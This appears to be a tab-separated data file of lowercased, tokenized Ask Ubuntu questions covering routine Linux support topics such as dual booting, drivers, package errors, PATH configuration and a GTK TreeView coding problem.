460952	is it possible to produce an iso image of my current installed ubuntu os ?	i am running ubuntu 12.04 tls . is there a way to produce an iso installable image of my current system so as i could burn the image on a cd and be able to install it on an other laptop ? i tried remastersys and several other tools : all of them produce and iso image which i can not install but only boot with .
460953	how do i name my system ?	i want to name my system that when anyone list all the connected pc in local network then my pc ip and name will be display there . i am using **sudo arp-scan -- interface=eth0 -- localnet ** this command to list the computer in local network . the result of this command is 10.0.0.1 c0:3f:0e : eb:78:24 netgear 10.0.0.2 e0:69:95 : eb:47:92 pegatron corporation 10.0.0.3 00:21:5c:81:25:85 intel corporate 10.0.0.4 28 : cf : e9:10:38 : e5 ( unknown ) 10.0.0.5 94:71 : ac : bf : cb:9d ( unknown ) 10.0.0.6 3c:43:8e:41 : ea:37 ( unknown ) where as 10.0.0.5 is my ip address which show as ( unknown ) i want to replace that ( unknow ) to some name so that users in local network can identify my pc . can anyone help me ? ?
460956	ubuntu 14.04 compiz taking lot of cpu resources	i recently installed ubuntu 14.04 desktop on a virtual machine with 1.5 gb of ram and 20gb hard-drive . the graphics card i have is `` intel graphics hd 3000 '' . some posts suggested to install the graphics driver intel-linux-graphics-installer_1.0.4-0intel1_amd64.deb i did that but still compiz is taking lot of cpu and the machine is very slow . please suggest a remedy . i was pretty comfortable with 12.04 lts and if it 's some known issue with 14.04 , i 'll revert to 12.04 lts . thanks ,
460957	the application software sources has closed unexpectedly	i am getting the following error message as a result of that i am unable to install any new software . unreportable reason : encountered a section with no package header : e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_quantal_universe_binary-i386_packages , e : the package list or status file could not be parsed or opened .
460960	i messed the file bash.bashrc ubuntu 14.04	trying to install java jre , i messed up the file bash.bashrc on ubuntu 14.04 , by adding these two lines at the end : export path= $ path : usr/java/bin/ ; export java_home= $ java_home : usr/java/bin/java/ now i can not do any command on terminal . when i open terminal it give me these errors : bash : export : `/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : usr/java/bin/ ' : not a valid identifier bash : export : ` : usr/java/bin/java/ ' : not a valid identifier bash : lesspipe : no such file or directory bash : dircolors : no such file or directory bash : ls : no such file or directory could anyone help ?
460961	getting error on my ubuntu 13.10 `` libsnmp15 ( > = 5.4.3~dfsg ) ''	i am going to install zabbix ( server monitoring tool ) on my ubuntu 13.10 server , but while installing it getting error like this , zabbix-server-mysql : depends : libsnmp15 ( > = 5.4.3~dfsg ) but it is not installable e : unable to correct problems , you have held broken packages . so..anyone can help me to resolve this ? thank you .
460962	grub is not showing after installing of ubuntu 13.04 on windows8	i 'm using windows 8.now i want the dual boot in my laptop with ubunutu 13.04. i already installed ubuntu 13.04.but after installing ubuntu whenever i start the system it is going to windows 8.how do i get grub menu for selecting os ?
460965	dual boot xp and ubuntu , xp installed first	c : drive ( 20gb ) windows xp service pack 3 ( installed ) d : drive ( 10gb ) ubuntu 14.04 ( installed ) i want run both windows oss side by side , but my pc runs only the latest installed windows . the options of the second installed windows os are not shown on startup . how can i operate another windows os ? please answer as soon as possible . i am waiting for your reply . thanks .
460967	pdflatex ca n't compile after 14.04 upgrade	i recently upgraded from 12.04 to 14.04 , and now i 'm in the process of fixing some broken applications : ( my latest problem is with pdflatex ( used through lyx ) , after upgrading i do n't seem to be able to export to pdf , the process fails with the error : latex error : file `cp1255.def ' not found . latex error : file `rlbabel.def ' not found . latex error : file `he8enc.def ' not found . i should probably note that the problem arises only when i try to compile documents containing hebrew which i sometimes use in my documents . this is really a big deal for me , so help would be much appreciated .
460970	recover the files from ubuntu	i had installed ubuntu 11.10 from windows 7 , the same was mistakenly uninstalled during 14.04 installation . is there any way to get the files from uninstalled ubuntu 11.10 ( kept the files in desktop , downloads ) please help .
460972	expandable horizontal writing application	i would like to know if there is any application dedicated for a simple purpose of enabling me to take horizontal expandable notes , not just bullet points , but that the headings when clicked can expand and show it 's sub-headings/notes . e.g . like this blockquote x __x1 _____x11 _____x12 _______x123 __x2 ____x21 blockquote etc etc etc so pretty much if you click on any of the headings the inferior text can be expanded or reduced accordingly , it 's not for programming but for note keeping . i once saw someone at uni using a application like this , i do n't know what operating system it was , or what the software was called . thanks jay
460974	ubuntu packaging help	hi i have been using ubuntu for a while now and would like to create apps for ubuntu . i have made a fun game and would like to have it in the software centre but i do not know how to create a debian package for it . any help is greatly appreciated . my game is made using c++ and sfml
460978	how to check if noises are generating by fans or by a hardisk over speed ?	my laptop vostrol 3450 , platform 14.04 lts ( same situation of 13.10 ) , sometime generating terrible noises . checking cpu temperature by `` tlp stat -t '' , it 's normal not high temp. , it 's around 60 degree celsius . it 's not always emit noises , which sometimes happens with cyclical uncertainty . how to check if noises are generating by fans or by a hardisk over speed , please ?
460980	computer stuck sometimes with nvidia drivers and ubuntu 14.04	i have dual booted machine ( windows 8.1 and ubuntu 14.04 ) ubuntu 14.04 has the option to use the nvidia driver ( 331.38 ) but after installing it , the computer hagns and unresponsive every once in a while only pressing alt+ctrl+f2 than alt+ctrl+f6 to go to the shell than back fixes it i have nvidia optimus with gforce 540mx inside using bumblebee works but makes the computer very slow and low res everything worked perfectly in ubuntu 13.10 and older with bumblebee any ideas ?
460981	what is this line at the top of many files ?	i have seen many files which have this line as the first line in them . what exactly is this ? # ! /usr/bin/env python what does it mean ? why is it necessary ?
460982	how to recover my windows 7 files	unfortunately i did replace windows7 with ubuntu os . my hard drive is formatted please help me any one to recovery my files
460987	xubuntu 14.4 dual boot ( windows 7 ) grub warning/problem	i installed xubuntu 14.4 lts dual boot with windows 7 . my hard disk is an ssd disk ( where both xubuntu 14.4 and win7 are installed - in a different partition ) . i first installed windows 7 and then i installed xubuntu . xubuntu loads without errors/warnings . but when i try to choose windows 7 from the grub i get the following warning/error : setting partition type to 0x7 failing writing sector 0x0 to 'hd0' then asks to `` press any key '' and after a while windows 7 boots without a problem . why i have this warning/error ? i tried to $ sudo update-grub inside xubuntu without any success . update : this is my fstab and grub.cfg http : //pastebin.com/vpbhlqlw
460993	gnome-session-quit to logout does not work when run as root with sudo	i am running ubuntu 14.04 and user name is pandya . pandya @ pandya-desktop : ~ $ gnome-session-quit when above command run without being sudo ( sudo su ) in terminal , it successfully logs out . but when running after sudo ( as a root ) , root @ pandya-desktop : /home/pandya # gnome-session-quit it gives error : ** ( gnome-session-quit:3168 ) : warning ** : failed to call logout : the name org.gnome.sessionmanager was not provided by any .service files so , because of being root , i tries to running command with sudo -u pandya gnome-session-quit to run command as a user pandya . but it gives same error . then i tries follwing to run as pandya : root @ pandya-desktop : /home/pandya # su pandya pandya @ pandya-desktop : ~ $ gnome-session-quit ** ( gnome-session-quit:3269 ) : warning ** : failed to call logout : the name org.gnome.sessionmanager was not provided by any .service files but it gives same error . hence , my question is : how to logout as a root ? because i want to put gnome-session-quit in sctipt which is to be run as root . ( i do n't want to kill forcefully process but want to normal logout prompt ) further specification : - i have script which is to be run as root . # ! /bin/bash ... .command to be executed ... .. sudo -u pandya gnome-session-quit
460994	trackpoint : can not move mouse pointer a short distance	i recently upgraded to ubuntu 14.04 , and at the same time started using xfce . my laptop is an lenovo sl-500 , but i use an external usb keyboard with more or less the same keyboard layout ( lenovo sk-8845 , picture at http : //researcher.watson.ibm.com/researcher/files/cn-wanghaic/ibm_sk8845.jpg ) . i used to be able to easily move the mouse a single pixel at a time using the trackpoint of either device . i still can with the trackpoint on the laptop , but not with the external keyboard . it seems to always move ( jump ) 5-10 pixels , regardless how little i touch it . this is driving me nuts , since i ca n't do any fine-grained motion ( e.g . getting the pointer within the small area allowing me to resize a window , or above a scroll bar to let me drag it ) . i tried tweaking both acceleration and sensitivity in settings- > mouse and touchpad , but regardless of the settings , the pointer still seems to move this minimum distance .
460995	usb drive not visible	i was kept my usb drive to the system its detecting but i not showing the drive . key board and mouse are working only usb stick are not working . $ lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 003 : id 413c:2107 dell computer corp . bus 003 device 002 : id 04b3:310c ibm corp. wheel mouse bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 007 : id 0781:5567 sandisk corp . bus 001 device 006 : id 04e8:685e samsung electronics co. , ltd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub usb 6 and 7 are the external device but not visible the drive i was mount the usb the flowing error $ sudo fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0000a321 device boot start end blocks id system /dev/sda1 * 1 29285 235226112 83 linux /dev/sda2 29285 30402 8970241 5 extended /dev/sda5 29285 30402 8970240 82 linux swap / solaris $ sudo mkdir /media/external $ sudo mount -t vfat /dev/sdb1 /media/external -o uid=1000 , gid=1000 , utf8 , dmask=027 , fmask=137 mount : special device /dev/sdb1 does not exist but it is not working
460997	process to run computer graphics programs in ubuntu	i would like to implement graphics programs in ubuntu . but i want to know whether is it possible to run these programs or not . if possible please let me know how to do the process , commands to run the program and also sample program . graphics programs include creation of line using linedda , bresenhams algorithms etc
461002	creating wifi hotspot in ubuntu 12.04	i tried to create a wifi hotspot that other computers and phones can connect to internet . i used links below to achieve but both did not work ubuntuforums.org/showthread.php ? t=2165035 youtube.com/watch ? v=gavnh8tsfeu my pc shows that they works fine but i could n't access it from my android phone . how can i solve this problem ? hardware : intel i5 , 4gb ram ( samsung ) software : ubuntu 12.04 - 32 bit thanks
461004	wireless problem in ubuntu 12.04	i purchased a dell inspiron 15r a few days back . it had ubuntu 12.04 preinstalled . the guys at the shop installed win8 on it 4 me . but later i decided to shift 2 ubuntu . & i 'm kinda a new user . i installed it back using the recovery disk . now everything is working fine except the wi-fi . can any1 please help me out ? ?
461009	how to avoide log out and log in while editing the sudoers file	i have edited the sudoers file by following the link . so far so good . it say `` log out , and then back in '' , for sure to see the effects . is there a way to see the effects with out doing this : `` log out , and then back in '' ?
461018	add to path , no ~/.profile nor ~/.pam_environment	i just compiled ffmpeg , now i just want to add it on the path . every source i can find reference .profile , and if not present or in specific cases , tell to use .pam_environment . but double tab give me : user @ domain : ~ $ echo $ home /home/user user @ domain : ~ $ cd /home/empreinte/ user @ domain : ~ $ nano . ./ .cache/ .local/ .npm/ ../ .config/ .nano_history .ssh/ .bash_history .dbshell .node-gyp/ am i missing something ? can i just create the file ? edit : user @ domain : ~ $ ls -a $ home . .cache drywall .nano_history npm-debug.log test x264 .. .config ffmpeg .node-gyp .ssh tmp yasm .bash_history .dbshell .local .npm sysplay video
461020	launcher labels have red background	i 've recently migrated to ubuntu from windows 7 and it 's been great so far . i have this one problem though that i can not solve . on the right side of the screen where my icons/shortcuts ( launcher ) are , when hovering the mouse above them the tags that appear next to them are red . sort of graphics problem . and when i click dash home it does n't open . although i do see the min/max/close buttons at the top i see nothing else . i 've already tried resetting unity , removing it , install , re-install etc ... pictures :
461025	broken windows flashdrive after sudo cp	i copied a pdf file on ubuntu to my windows-formatted flashdrive with sudo cp file.pdf /mnt/sdb4/ ( i am not sure if /mnt/sdb4/ was the path though ) . now i ca n't access the drive neither from windows nor from linux ( it does n't appear in my computer ) . i do n't want to format it as there were some important files on it . how can i fix it ?
461026	problem in installing xmhf on ubuntu 12.04	i am new to linux os . according to the requirement of my project i have to install extensible hypervisor framework ( xmhf ) and then build the required hypapp over it . grub1 is supposed to load the xmhf at boot time and then the ubuntu os has to laod over it , but when i am trying to boot the system according to the steps mentioned to install xmhf the system stops at the starting up ... . state at the time of booting . i dont know where i have done mistake . i have checked it many times but nothing useful . can anyone please help me with this ? ? `` installing xmhf '' manual can be found at http : //xmhf.sourceforge.net/doc/xmhf/doc/installing-xmhf.md.html my grub entry for xmhf is title xmhf rootnoverify ( hd0,0 ) // as i have no primary partition for the hard drive kernel /boot/init-x86.bin module /boot/hypervisor.bin.gz modulenounzip ( hd0 ) +1 thanks in advance ! ! ! ! ! ! ! !
461030	ubuntu installation on lenovo g505-59-387133	recently i have purchased a lenovo laptop g505-59-387133 with following configuration 4 gb ram 500 gb hard drive amd with 1 ghz e-2100 apu processor i want to install ubuntu or any linux distro in it whether in dual boot or standalone linux . can any one figure me out , , please
461031	enable access from my public ip instead of localhost via apache 2.4	i have ubuntu 14.04 , apache 2.4.7 $ apache2 -v server version : apache/2.4.7 ( ubuntu ) server built : apr 3 2014 12:20:28 i made many attempts to access from my public ip firstly , i enable authz_host : $ sudo a2enmod authz_host then , i follow this issue to configure apache : unfortunately , i do n't find the file whose path : /etc/apache2/conf.d/restrict.conf my question : what 's the new config file to allow access from public ip . that it means : be able to access : either by : http : //localhost/myproject or by : http : //87.x.x.x/myproject
461032	sflphone 1.3.0 microphone on ubuntu 14.04 not working	i compared the following 2 setups with original packages from the ubuntu distributions and with the same headset and the same second telephone and the same telephone account data 1 ) sflphone 1.0.2 on ubuntu 12.04 long term support with gnome-alsa-mixer 0.9.7 2 ) sflphone 1.3.0 on ubuntu 14.04 long term support with gnome-alsa-mixer 0.9.7 setup 1 is working in both directions speaker and microphone . setup 2 is not working : only the microphone of the sflphone side is not working i used gnome-alsa-mixer to achieve a minimum quality of the phone calls with sflphone 1.0.2 . the gnome-alsa-mixer has the same version in both ubuntu versions but the ubuntu 14 version displays less options to change : 100 % master ( 100 % = slider in top position ) 100 % headphone 100 % speaker and activated mute 100 % pcm 100 % mic ( missing in ubuntu 14 ) 100 % mic boos 90 % beep 70 % capture activated recording ( missing in ubuntu 14 ) 100 % digital 0 % internal with not activated mute ( missing in ubuntu 14 ) 0 % internal do you have an idea what do i have to change for using the sflphone1.3.0 on ubuntu 14 ?
461035	looking for aptoncd equivalent for ubuntu server 12.04	is there an equivalent of aptoncd for ubuntu server ( 12.04 ) edition ? if not , can i use a local repository cread by aptoncd ( using a desktop edition ) and use it from ubuntu server 12.04 edition ? if yes , how ?
461038	i ca n't install ubuntu x64 on xps 15z	i have been having issues installing ubuntu 14.04 13.10 12.04 on my dell xps 15z from usb . 32-bit installs fine off usb . i have seen some answers on here trying to solve it and have attempted these solutions . so here is my procedure : install usb using unetbootin reboot from usb if i click try or install my computer waits a few seconds and then puts the screen in the top left 1/16 of the screen and freezes . my caps lock stops lighting up when clicked at this point and i have to hold the power down to reboot . if i click the second try from live ( it gives me the option twice ) it will boot ubuntu and freeze as soon as i type a key . however , the mouse works fine ( prior to me touching a key that is ) . i must reboot by holding the power button . i tried to do acpi=off but no change does anyone have any suggestions ?
461044	ubuntu 14.04 suspend problem	i was looking for a solution of this problem and there are few post but no exact solution ( if there is any ) . i have 64-bit ubuntu 14.04 on dell inspiron-3537 . after resuming from suspend it takes me to log-in screen , and i 'm unable to move cursor and no hotkeys are working nor `` ctrl+alt+f1 '' . i tried sudo pm-suspend and after resuming it takes me to my desktop and this time i 'm able to move my cursor but again nothing wont work . graphic drivers are installed . thanks
461045	unable to start webcam via cheese : cluttervideosink missing	i 'm running ubuntu 14.04 64bit on my hp dm4 laptop . also , i have gstreamer1.0-clutter installed . still getting that error . thanks
461047	unable to boot windows 7 after ubuntu installation	i installed ubuntu 12.04 64-bit on my pc , which has following configuration : processor : i3 dual core ram : 4 gb hard disk : 500 gb it already has windows 7 32-bit . during installation , i chose the option to install ubuntu alongside windows 7 . it made partitions ext4 and swap area , but after installation , when i restart my pc i did not find windows 7 on my system . what should i do ? i want dual boot with ubuntu with windows 7 .
461049	nvidia graphic card seems not revelead by ubuntu 12.04	my laptop is an asus f550c . if i execute the command lspci| egrep vga it prints 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) like the detection of an nvidia card is missing . i 've installed the native driver nvidia . they are activated , but the driver manager says they are not currently used . how to solve ?
461050	ubuntu server virtual audio	i wanted to know how to configure a server with ubuntu 12.04 lts to make it a platform for audio streaming via another program . i think that there are no drivers installed , and being a server even the device . i checked with the command lspci the presence of audio devices , and i have not found .
461051	since upgrading to ubuntu 14.04 i am unable to print to my canon mg5350	the printer worked fine ( including scanning ) in 13.10 , but since the upgrade it has stopped ( sits at idle doing nothing ) . i have the official canon drivers installed and have tried re-installing with the latest copies from the website . still no go . the printer is still working ( wirelessly connected to the network ) , as i can print okay from windows . has anyone else had the same issue or knows of a fix ?
461053	how do i install when i dont get the option to write to disk	i am running window 7 i want to setup a dual boot , i do not get the option to write to disk how can i setup a cd with out it ?
461057	ssh-add only once at startup and not everytime i open new terminal window	whenever i open a new terminal window and want to ssh -a somewhere i have to retype : eval `ssh-agent` ssh-add how do i enter the ssh-add key-password once at startup and never again till i log out or restart my computer ? ( ubuntu 14.04 )
461059	bitorrent sync is not starting after i login	bitorrent is not starting after i log in to my computer i already tried to start it with service start btsync but is not working ! how can i make bit torrent sync to start when ubuntu starts ?
461062	lubuntu 14.04 problem starting lxsession-default-apps	i have one problem , i ca n't execute lxsession-default-apps on lubuntu 14.04 because i get because said to me `` the database is updating , please wait '' if i try to run lxsession-default-apps , i get this error : ** message : utils.vala:30 : config_path_directory : /home/user/.config/lxsession-default-apps ** message : desktop-files-backend.vala:171 : test config_path : /home/user/.config/lxsession-default-apps/settings.conf ** message : desktop-files-backend.vala:237 : scanning folder : /usr/share/applications ** message : desktop-files-backend.vala:278 : start scanning ** message : desktop-files-backend.vala:257 : scanning folder : /usr/share/app-install/desktop ** message : desktop-files-backend.vala:278 : start scanning error : list_files failed : no such file or directory ** message : desktop-files-backend.vala:333 : finishing scanning ** message : desktop-files-backend.vala:189 : signal finish scanning with mode : write ** message : desktop-files-backend.vala:333 : finishing scanning any help would be appreciated . thanks . regards .
461063	gaming : ravensword libxcursor1 error	xubuntu 14.04 , 64 bit , i paid for a humble bundle package and got ravensword , downloaded the linux edition when i run ./rs2.x86 i get ./rs2.x86 ./rs2.x86 : error while loading shared libraries : libxcursor.so.1 : can not open shared object file : no such file or directory i run âś sudo apt-get install libxcursor1 reading package lists ... done building dependency tree reading state information ... done libxcursor1 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . so locate libxcursor1 /usr/share/doc/libxcursor1 /usr/share/doc/libxcursor1/changelog.debian.gz /usr/share/doc/libxcursor1/copyright /var/lib/dpkg/info/libxcursor1 : amd64.list /var/lib/dpkg/info/libxcursor1 : amd64.md5sums /var/lib/dpkg/info/libxcursor1 : amd64.postinst /var/lib/dpkg/info/libxcursor1 : amd64.postrm /var/lib/dpkg/info/libxcursor1 : amd64.shlibs /var/lib/dpkg/info/libxcursor1 : i386.list /var/lib/dpkg/info/libxcursor1 : i386.postrm i tried reinstalling that library , i tried installing all of these nothing worked . update after sudo apt-get install libxcursor1 : i386 i get âś ./rs2.x86 set current directory to /home/elie/games/ravensword_linux found path : /home/elie/games/ravensword_linux/rs2.x86 mono path [ 0 ] = '/home/elie/games/ravensword_linux/rs2_data/managed' mono path [ 1 ] = '/home/elie/games/ravensword_linux/rs2_data/mono' mono config path = '/home/elie/games/ravensword_linux/rs2_data/mono/etc' creating user config folder : /home/elie/.config/unity3d playerprefs - creating folder : /home/elie/.config/unity3d/crescent moon games llc playerprefs - creating folder : /home/elie/.config/unity3d/crescent moon games llc/ravensword2 [ 1 ] 14591 abort ( core dumped ) ./rs2.x86
461064	unable to create database due access denied	i just logged in to ubuntu 12.04 as a normal user ( vivek ) and opened the terminal to create a database , i wrote : create database hello ; and the error i had is : error 1044 ( 42000 ) : access denied for user '' @ 'localhost ' to database 'vivek' if i login as root user then even mysql is not opening and having the error message : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) what to do now .
461067	is peap-tls possible for wired & wireless 802.1x ?	i 'd require wired and wireless peap-tls 802.1x authentication for my company network . network-manager only shows ms-chapv2 , md5 and gtc when selecting peap , not tls . as eap-tls is supported i do n't think a package is missing .
461072	how to get the tags for the installed software in ubuntu ?	i can retrieve the softwares using the dpkg command but is there a command to get the associated category for the software .like if i have firefox installed can i some retrieve a tag for it that says browser or may be a more abstract term say internet tools .
461076	extract full link of a div element	i 'm downloading episodes from a series , but i 'm tired for joining in the site , copying the link and downloading it for each episode . first , i join in the site and i get the html code . the code is big , but i 'm interested in this in particular ( it is where the link is ) var e=array ( ) , d=1 ; e [ 1 ] = ' < div style= '' margin-left:7px '' > < object width= '' 720 '' height= '' 450 '' class= '' blog_video_class '' id= '' blog_video-ee57f234e359092e '' classid= '' clsid : d27cdb6e-ae6d-11cf-96b8-444553540000 '' codebase= '' http : //download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab # version=6,0,40,0 '' > < param name= '' movie '' value= '' //www.youtube.com/get_player '' > < param name= '' bgcolor '' value= '' # ffffff '' > < param name= '' allowfullscreen '' value= '' true '' > < param name= '' flashvars '' value= '' flvurl=http : //redirector.googlevideo.com/videoplayback ? id % 3da87eff0521883521 % 26itag % 3d5 % 26source % 3dblogger % 26app % 3dblogger % 26cmo % 3dsensitive_content % 253dyes % 26ip % 3d0.0.0.0 % 26ipbits % 3d0 % 26expire % 3d1400695090 % 26sparams % 3did , itag , source , ip , ipbits , expire % 26signature % 3daa6b72c5d9c12d461c7a0e3f59b2c208a7cdc82d.ae374e37e58a41191b10f30aa43be42379da6d5b % 26key % 3dck2 & amp ; iurl=http : //video.google.com/thumbnailserver2 ? app % 3dblogger % 26contentid % 3da87eff0521883521 % 26offsetms % 3d5000 % 26itag % 3dw160 % 26sigh % 3daukia9j5groobshbybzlfhmgllc & amp ; autoplay=0 '' > < embed src= '' //www.youtube.com/get_player '' type= '' application/x-shockwave-flash '' width= '' 720 '' height= '' 450 '' bgcolor= '' # ffffff '' flashvars= '' flvurl=http : //redirector.googlevideo.com/videoplayback ? id % 3da87eff0521883521 % 26itag % 3d5 % 26source % 3dblogger % 26app % 3dblogger % 26cmo % 3dsensitive_content % 253dyes % 26ip % 3d0.0.0.0 % 26ipbits % 3d0 % 26expire % 3d1400695090 % 26sparams % 3did , itag , source , ip , ipbits , expire % 26signature % 3daa6b72c5d9c12d461c7a0e3f59b2c208a7cdc82d.ae374e37e58a41191b10f30aa43be42379da6d5b % 26key % 3dck2 & iurl=http : //video.google.com/thumbnailserver2 ? app % 3dblogger % 26contentid % 3da87eff0521883521 % 26offsetms % 3d5000 % 26itag % 3dw160 % 26sigh % 3daukia9j5groobshbybzlfhmgllc & autoplay=0 '' allowfullscreen= '' true '' / > < /object > < /div > ' ; e [ 2 ] = ' < div style= '' margin-left:7px '' > < iframe src= '' http : //videosasd.com/play-zs-www30.zippyshare.com/v/94301695/file.html '' width= '' 720 '' height= '' 450 '' scrolling= '' no '' frameborder= '' 0 '' > < /iframe > < /div > ' ; well , its a looong code , but i 'm interested to get this . ( there are 2 identical links , both work without the ' & amp ' in the end ) http : //redirector.googlevideo.com/videoplayback ? id % 3da87eff0521883521 % 26itag % 3d5 % 26source % 3dblogger % 26app % 3dblogger % 26cmo % 3dsensitive_content % 253dyes % 26ip % 3d0.0.0.0 % 26ipbits % 3d0 % 26expire % 3d1400695090 % 26sparams % 3did , itag , source , ip , ipbits , expire % 26signature % 3daa6b72c5d9c12d461c7a0e3f59b2c208a7cdc82d.ae374e37e58a41191b10f30aa43be42379da6d5b % 26key % 3dck2 & amp now , i 'm using this regex ( note i 'm noob with this , i test it and works ) \s*flvurl\s*=\s* ( \ '' ( [ ^ '' ] *\ '' ) | ' [ ^ ' ] *'| ( [ ^ ' '' > \s ] + ) ) ; * % 26key % 3dck2 & amp and , in the terminal i use wget -q -o - `` serverlink '' | sed -e `` s/\s*flvurl\s*=\s* ( \ '' ( [ ^ '' ] *\ '' ) | ' [ ^ ' ] *'| ( [ ^ ' '' > \s ] + ) ) ; * % 26key % 3dck2 & amp//g '' i get error with unexpected token ) '` does anyone know how i can fix it ? ( or , maybe , someone knows a better regex to get the link from the first code box )
461078	unselect the gtk treeselection when cleraing the treestore model	i followed the python-gtk-3-tutorial and implemented a simple file browser using gtk treeview . it works pretty well , but but my problem is , that by the time of the initialization the first item in the treeview is already selected by default . i initialize the treeselection using : treeselection = treeview.get_selection ( ) then i connect the tree selection with a callback function : treeselection.connect ( `` changed '' , treeselectionchanged ) def treeselectionchanged ( treeselection ) : treemodel , treeiter = treeselection.get_selected ( ) if treeiter ! = none : print `` you selected '' , treemodel [ treeiter ] [ 0 ] when my app starts the first entry in the treeview is already selected and it 's name is printed out . if i re-read the data and clear the tree-model ( treestore.clear ( ) ) i also get responses to `` changes '' in the treeview and the names of other items in the treeview are also printed out . i do not know how to unselect the selection made by default and unselect all items before clearing the treestore . i could not figure out how . could please someone point me to my mistake ? here is the example code : # ! /usr/bin/python import os , stat from gi.repository import gtk from gi.repository.gdkpixbuf import pixbuf class mainwindow ( gtk.window ) : def __init__ ( self ) : gtk.window.__init__ ( self , title= '' simple photo importer '' , default_width = 400 , default_height = 600 ) # initialize new gtk box container self.filesystemtreebox = gtk.box.new ( gtk.orientation.vertical , 5 ) self.add ( self.filesystemtreebox ) # initialize the filesystem treestore self.filesystemtreestore = gtk.treestore ( str , pixbuf , str , bool ) # populate the tree store self.populatefilesystemtreestore ( self.filesystemtreestore , '/home/karlitos ' ) # initialize the treeview self.filesystemtreeview = gtk.treeview ( self.filesystemtreestore ) # , default_width = 400 , default_height = 600 ) self.filesystemtreeview.set_headers_visible ( false ) # self.filesystemtreeview.columns_autosize ( ) # create a treeviewcolumn treeviewcol = gtk.treeviewcolumn ( title=none ) treeviewcol.set_sizing ( gtk.treeviewcolumnsizing.autosize ) # treeviewcol.expand = true # create a column cell to display text colcelltext = gtk.cellrenderertext ( ) # create a column cell to display an image colcellimg = gtk.cellrendererpixbuf ( ) # add the cells to the column treeviewcol.pack_start ( colcellimg , false ) treeviewcol.pack_start ( colcelltext , true ) # bind the text cell to column 0 of the tree 's model treeviewcol.add_attribute ( colcelltext , `` text '' , 0 ) # bind the image cell to column 1 of the tree 's model treeviewcol.add_attribute ( colcellimg , `` pixbuf '' , 1 ) # append the columns to the treeview self.filesystemtreeview.append_column ( treeviewcol ) # add `` on expand '' callback self.filesystemtreeview.connect ( `` row-expanded '' , self.onrowexpanded ) # add `` on collapse '' callback self.filesystemtreeview.connect ( `` row-collapsed '' , self.onrowcollapsed ) # add tree view selection filesystemtreeselection = self.filesystemtreeview.get_selection ( ) filesystemtreeselection.connect ( `` changed '' , self.filesystemtreeselectionchanged ) # add scroll view self.scrollview = gtk.scrolledwindow ( ) self.scrollview.add ( self.filesystemtreeview ) # append the scrollview to the window ( this ) # self.add ( self.scrollview ) self.filesystemtreebox.pack_start ( self.scrollview , true , true , 0 ) # add a button for selecting different folder self.readnewdirbutton = gtk.button ( label= '' read new directory '' ) self.readnewdirbutton.connect ( `` clicked '' , self.readnewdirectory ) # self.add ( self.readnewdirbutton ) self.filesystemtreebox.pack_start ( self.readnewdirbutton , false , false , 0 ) def populatefilesystemtreestore ( self , treestore , path , parent=none ) : appendhiddenitems = false folders = [ ] files = [ ] # iterate over the items in the path for item in os.listdir ( path ) : # skip item if it 's name brgiins with ' . ' and appendhiddenitems ist set to 'false' if not appendhiddenitems and item [ 0 ] == ' . ' : continue # get the absolute path of the item itemfullname = os.path.join ( path , item ) # extract metadata from the item itemmetadata = os.stat ( itemfullname ) # determine if the item is a folder itemisfolder = stat.s_isdir ( itemmetadata.st_mode ) # generate an icon from the default icon theme itemicon = gtk.icontheme.get_default ( ) .load_icon ( `` folder '' if itemisfolder else `` empty '' , 22 , 0 ) # append the item with corresponding metadata to related arrays if itemisfolder : folders.append ( [ item , itemicon , itemfullname , itemisfolder ] ) else : files.append ( [ item , itemicon , itemfullname , itemisfolder ] ) # append dummy when no entries in the current folder if not folders and not files : treestore.append ( parent , [ none , none , none , none ] ) else : for folderentry in sorted ( folders ) : # append the folders currentiter = treestore.append ( parent , folderentry ) # append the dummy nodes to the folders treestore.append ( currentiter , [ none , none , none , none ] ) for fileentry in sorted ( files ) : treestore.append ( parent , fileentry ) def onrowexpanded ( self , treeview , treeiter , treepath ) : # get the associated model treestore = treeview.get_model ( ) # get the full path of the position newpath = treestore.get_value ( treeiter , 2 ) # populate the subtree on curent position self.populatefilesystemtreestore ( treestore , newpath , treeiter ) # remove the first child ( dummy node ) treestore.remove ( treestore.iter_children ( treeiter ) ) def onrowcollapsed ( self , treeview , treeiter , treepath ) : # get the associated model treestore = treeview.get_model ( ) # get the iterator of the first child currentchilditer = treestore.iter_children ( treeiter ) # loop as long as some childern exist while currentchilditer : # remove the first child treestore.remove ( currentchilditer ) # refresh the iterator of the next child currentchilditer = treestore.iter_children ( treeiter ) # append dummy node treestore.append ( treeiter , [ none , none , none , none ] ) def readnewdirectory ( self , widget ) : # initialize the open directory dialog opendirectorydialog = gtk.filechooserdialog ( `` please choose a folder '' , self , gtk.filechooseraction.select_folder , ( gtk.stock_cancel , gtk.responsetype.cancel , `` select '' , gtk.responsetype.ok ) ) opendirectorydialog.set_default_size ( 800 , 400 ) # initialize the response opendirectoryresponse = opendirectorydialog.run ( ) if opendirectoryresponse == gtk.responsetype.ok : self.filesystemtreestore.clear ( ) self.populatefilesystemtreestore ( self.filesystemtreestore , opendirectorydialog.get_filename ( ) ) # elif opendirectoryresponse == gtk.responsetype.cancel : # do something opendirectorydialog.destroy ( ) def filesystemtreeselectionchanged ( self , filesystemtreeselection ) : filesystemtreemodel , filesystemtreeiter = filesystemtreeselection.get_selected ( ) # _rows ( ) if filesystemtreeiter ! = none : print `` you selected '' , filesystemtreemodel [ filesystemtreeiter ] [ 0 ] win = mainwindow ( ) win.connect ( `` delete-event '' , gtk.main_quit ) win.show_all ( ) gtk.main ( )
